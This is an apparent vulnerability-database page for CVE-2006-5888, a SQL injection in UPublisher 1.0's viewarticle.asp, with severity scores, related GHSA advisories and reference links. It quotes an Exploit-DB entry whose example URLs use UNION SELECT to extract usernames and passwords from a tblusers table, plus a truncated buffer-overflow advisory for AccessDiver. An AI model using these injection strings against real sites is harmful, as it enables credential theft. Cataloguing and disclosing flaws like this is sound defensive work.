CVE-2006-5888
published 2006-11-14CVE-2006-5888: SQL injection vulnerability in viewarticle.asp in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the ID…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.12%
62.1th percentile
SQL injection vulnerability in viewarticle.asp in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| superfreaker_studios | upublisher | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pjg8-mhcc-g856: Multiple SQL injection vulnerabilities in Superfreaker Studios UPublisher 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6398 [HIGH] GHSA-pjg8-mhcc-g856: Multiple SQL injection vulnerabilities in Superfreaker Studios UPublisher 1
Multiple SQL injection vulnerabilities in Superfreaker Studios UPublisher 1.0 allow remote attackers to execute arbitrary SQL commands via unspecified vectors in (a) sendarticle.asp and (b) printarticle.asp, and the ID parameter to (c) index.asp and (d) preferences.asp, different vectors than CVE-2006-5888.
GHSA
GHSA-ghjf-62x3-p3rw: SQL injection vulnerability in viewarticle
ghsa_unreviewed·2022-05-01
CVE-2006-5888 [HIGH] GHSA-ghjf-62x3-p3rw: SQL injection vulnerability in viewarticle
SQL injection vulnerability in viewarticle.asp in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
No detection rules found.
Exploit-DB
AccessDiver 4.301 - Buffer Overflow
exploitdb·2015-12-26
AccessDiver 4.301 - Buffer Overflow
AccessDiver 4.301 - Buffer Overflow
---
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt
Vendor:
M. Jean Fages
www.accessdiver.com
circa 1998-2006
Product:
AccessDiver V4.301 build 5888
AccessDiver is a security tester for Web pages. It has got a set of tools
which
will verify the robustness of you accounts and directories. You will know
if your
customers, your users and you can use safely your web site.
Vulnerability Type:
Buffer Overflow
CVE Reference:
N/A
Vulnerability Details:
AccessDiver is vulnerable to multiple buffer overflows, two vectors are
described below.
1) buffer overflow @ 2073 bytes in URL field for Server / IP address and
will overwrite NSEH and SEH excepti
Exploit-DB
UPublisher 1.0 - 'viewarticle.asp' SQL Injection
exploitdb·2006-11-12
CVE-2006-5888 UPublisher 1.0 - 'viewarticle.asp' SQL Injection
UPublisher 1.0 - 'viewarticle.asp' SQL Injection
---
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
No writeups or analysis indexed.
http://secunia.com/advisories/22840http://www.securityfocus.com/archive/1/451372/100/0/threadedhttp://www.vupen.com/english/advisories/2006/4463https://exchange.xforce.ibmcloud.com/vulnerabilities/30190https://www.exploit-db.com/exploits/2765http://secunia.com/advisories/22840http://www.securityfocus.com/archive/1/451372/100/0/threadedhttp://www.vupen.com/english/advisories/2006/4463https://exchange.xforce.ibmcloud.com/vulnerabilities/30190https://www.exploit-db.com/exploits/2765
2006-11-14
Published